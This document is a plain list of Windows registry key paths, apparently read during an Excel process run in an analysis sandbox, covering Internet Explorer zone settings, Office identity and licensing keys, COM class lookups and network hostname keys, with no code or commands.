HKEY_CURRENT_USER\Software\Policies\Microsoft\Office\16.0\Common\Toolbars
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Toolbars
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Toolbars\AttemptDisabledActionMessage
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Windows NT\CurrentVersion\BuildLabEx
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows NT\CurrentVersion\BuildLabEx
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_IGNORE_POLICIES_ZONEMAP_IF_ESC_ENABLED_KB918915
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_IGNORE_POLICIES_ZONEMAP_IF_ESC_ENABLED_KB918915
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_IGNORE_POLICIES_ZONEMAP_IF_ESC_ENABLED_KB918915
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\ZoneMap\Ranges
HKEY_LOCAL_MACHINE\ZoneMap\Ranges
HKEY_CURRENT_USER\ZoneMap\Ranges
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ZONES_CHECK_ZONEMAP_POLICY_KB941001
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ZONES_CHECK_ZONEMAP_POLICY_KB941001
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ZONES_CHECK_ZONEMAP_POLICY_KB941001
HKEY_LOCAL_MACHINE\Software\Policies
HKEY_CURRENT_USER\Software
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\(Default)
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_LOCALMACHINE_LOCKDOWN
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_LOCALMACHINE_LOCKDOWN
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_LOCALMACHINE_LOCKDOWN\(Default)
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_LOCALMACHINE_LOCKDOWN
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_LOCALMACHINE_LOCKDOWN\EXCEL.EXE
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Internet Explorer
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Internet Explorer\Security
HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Security\DisableSecuritySettingsCheck
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Internet Explorer\Security\DisableSecuritySettingsCheck
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\System\Setup
HKEY_LOCAL_MACHINE\System\Setup
HKEY_LOCAL_MACHINE\System\Setup\SystemSetupInProgress
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\Flags
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\Flags
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\Flags
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\Flags
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\Flags
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_PROTOCOL_LOCKDOWN
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_PROTOCOL_LOCKDOWN
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_PROTOCOL_LOCKDOWN\(Default)
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_PROTOCOL_LOCKDOWN
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_PROTOCOL_LOCKDOWN\EXCEL.EXE
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\TokenBroker\ProviderInfo\Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy
HKEY_CURRENT_USER\Software\Classes\Interface\{B5A6F1BC-1641-5F4C-B946-79084E41EE35}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\Interface\{B5A6F1BC-1641-5F4C-B946-79084E41EE35}
HKEY_LOCAL_MACHINE\Software\Classes\Interface\{B5A6F1BC-1641-5F4C-B946-79084E41EE35}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\Interface\{B5A6F1BC-1641-5F4C-B946-79084E41EE35}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\Interface\{B5A6F1BC-1641-5F4C-B946-79084E41EE35}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\Software\Classes\Interface\{B5A6F1BC-1641-5F4C-B946-79084E41EE35}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\Interface\{B5A6F1BC-1641-5F4C-B946-79084E41EE35}\ProxyStubClsid32\(Default)
HKEY_CURRENT_USER\Software\Classes\Interface\{9E8E4BD8-BFC5-4785-94C2-B210DB698776}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\Interface\{9E8E4BD8-BFC5-4785-94C2-B210DB698776}
HKEY_LOCAL_MACHINE\Software\Classes\Interface\{9E8E4BD8-BFC5-4785-94C2-B210DB698776}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\Interface\{9E8E4BD8-BFC5-4785-94C2-B210DB698776}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\Interface\{9E8E4BD8-BFC5-4785-94C2-B210DB698776}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\Software\Classes\Interface\{9E8E4BD8-BFC5-4785-94C2-B210DB698776}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\Interface\{9E8E4BD8-BFC5-4785-94C2-B210DB698776}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Wow6432Node\Microsoft\LanguageOverlay\OverlayPackages\en-US
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Identity\ADUserName
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Identity\SignedOutADUser
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Identity\ConnectedAccountCID
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Identity\SignedOutMSAUser
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1186\{00000000-0000-0000-0000-000000000000}
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\Identities\Anonymous\Settings\1170\{00000000-0000-0000-0000-000000000000}
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\Default UI Theme
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Default UI Theme
HKEY_USERS\.default\Software\Microsoft\IdentityCRL\AppData\appid=d3590ed6-52b3-4102-aeff-aad2292ab01c&clientid=d3590ed6-52b3-4102-aeff-aad2292ab01c
HKEY_USERS\.default\Software\Microsoft\IdentityCRL\AppData\appid=d3590ed6-52b3-4102-aeff-aad2292ab01c&clientid=d3590ed6-52b3-4102-aeff-aad2292ab01c\FirstParty
HKEY_CURRENT_USER\Software\Policies\Microsoft\Office\Common\Audience
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming\RoamingLastWriteTimeExcel
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Licensing\ViewerMode
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Experiment\excel\SubscriptionCustomerLicenseInfo
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\PerpetualLicenseInfo
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\DisableRobustifiedUNC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Defender\Features
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Defender\Features\SenseDlpEnabled
HKEY_CURRENT_USER\Software\Policies\Microsoft\Office\16.0\Common\FixedFormat
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\FixedFormat
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\DRM
HKEY_CURRENT_USER\Software\Policies\Microsoft\Office\16.0\Common\DRM
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\DRM\AutoExpandDLs
HKEY_CURRENT_USER\Software\Policies\Microsoft\Office\16.0\Common\DRM\AutoExpandDLs
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Security\NoPromptForRC4Encryption
HKEY_CURRENT_USER\Software\Policies\Microsoft\Office\16.0\Common\Security\Labels
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Security\Labels
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\Font
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\SyncMode5
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\SessionStartTimeDefaultDeltaSecs
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{352481E8-33BE-4251-BA85-6007CAEDCF9D}
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{352481E8-33BE-4251-BA85-6007CAEDCF9D}
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{352481E8-33BE-4251-BA85-6007CAEDCF9D}\Category
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{352481E8-33BE-4251-BA85-6007CAEDCF9D}\Name
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{352481E8-33BE-4251-BA85-6007CAEDCF9D}\ParentFolder
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{352481E8-33BE-4251-BA85-6007CAEDCF9D}\DeferPrecreateAndRedirect
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{352481E8-33BE-4251-BA85-6007CAEDCF9D}\Description
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{352481E8-33BE-4251-BA85-6007CAEDCF9D}\RelativePath
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{352481E8-33BE-4251-BA85-6007CAEDCF9D}\ParsingName_36354489
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{352481E8-33BE-4251-BA85-6007CAEDCF9D}\ParsingName
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{352481E8-33BE-4251-BA85-6007CAEDCF9D}\InfoTip
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{352481E8-33BE-4251-BA85-6007CAEDCF9D}\LocalizedName
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{352481E8-33BE-4251-BA85-6007CAEDCF9D}\Icon
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{352481E8-33BE-4251-BA85-6007CAEDCF9D}\Security
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{352481E8-33BE-4251-BA85-6007CAEDCF9D}\StreamResource
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{352481E8-33BE-4251-BA85-6007CAEDCF9D}\StreamResourceType
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{352481E8-33BE-4251-BA85-6007CAEDCF9D}\LocalRedirectOnly
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{352481E8-33BE-4251-BA85-6007CAEDCF9D}\Roamable
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{352481E8-33BE-4251-BA85-6007CAEDCF9D}\PreCreate
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{352481E8-33BE-4251-BA85-6007CAEDCF9D}\Stream
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{352481E8-33BE-4251-BA85-6007CAEDCF9D}\PublishExpandedPath
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{352481E8-33BE-4251-BA85-6007CAEDCF9D}\DefinitionFlags
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{352481E8-33BE-4251-BA85-6007CAEDCF9D}\DPLProtectionLevel
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{352481E8-33BE-4251-BA85-6007CAEDCF9D}\Attributes
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{352481E8-33BE-4251-BA85-6007CAEDCF9D}\FolderTypeID
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{352481E8-33BE-4251-BA85-6007CAEDCF9D}\InitFolderHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{352481E8-33BE-4251-BA85-6007CAEDCF9D}\PropertyBag
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{352481E8-33BE-4251-BA85-6007CAEDCF9D}\PropertyBag
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionInfo\1
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionInfo\1\KnownFolders
HKEY_USERS\.DEFAULT
HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\Cache
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\Cache
HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\Local AppData
HKEY_CURRENT_USER\Software\Classes\Interface\{A168AADC-1674-49DA-AD4F-4F27DF8760D0}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\Interface\{A168AADC-1674-49DA-AD4F-4F27DF8760D0}
HKEY_LOCAL_MACHINE\Software\Classes\Interface\{A168AADC-1674-49DA-AD4F-4F27DF8760D0}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\Interface\{A168AADC-1674-49DA-AD4F-4F27DF8760D0}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\Interface\{A168AADC-1674-49DA-AD4F-4F27DF8760D0}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\Software\Classes\Interface\{A168AADC-1674-49DA-AD4F-4F27DF8760D0}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\Interface\{A168AADC-1674-49DA-AD4F-4F27DF8760D0}\ProxyStubClsid32\(Default)
HKEY_CURRENT_USER\Software\Classes\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\TreatAs
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\TreatAs
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\TreatAs
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\ActivateOnHostFlags
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\(Default)
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InprocServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InprocServer32
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InprocServer32
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InprocServer32\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InprocServer32\ThreadingModel
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InprocHandler32
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InprocHandler32
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InprocHandler32
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InprocHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InprocHandler
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InprocHandler
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\LocalServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\LocalServer32
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\LocalServer32
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\AppID
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\LocalServer
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\LocalServer
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\LocalServer
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\Elevation
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\Elevation
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\Elevation
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters\Hostname
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\System\DNSClient
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters\Domain
HKEY_CURRENT_USER\Software\Classes\CLSID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Registry\Machine\Software\Classes\Wow6432Node\CLSID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}\TreatAs
